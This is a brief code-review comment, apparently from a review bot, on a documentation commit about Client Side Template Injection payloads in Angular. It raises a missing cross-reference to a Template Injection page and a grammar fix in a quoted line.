> Angular as of version 1.6 have removed the sandbox altogether
|
||||||
|
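Review bot: `The following payloads are based on Client Side Template Injection.` should link to the Template Injection page whose client-side section this commit removes; otherwise the cross-reference survives only in the commit history. The context quote `Angular as of version 1.6 have removed the sandbox altogether` needs `has`, and as a `>` quote it should carry an attribution.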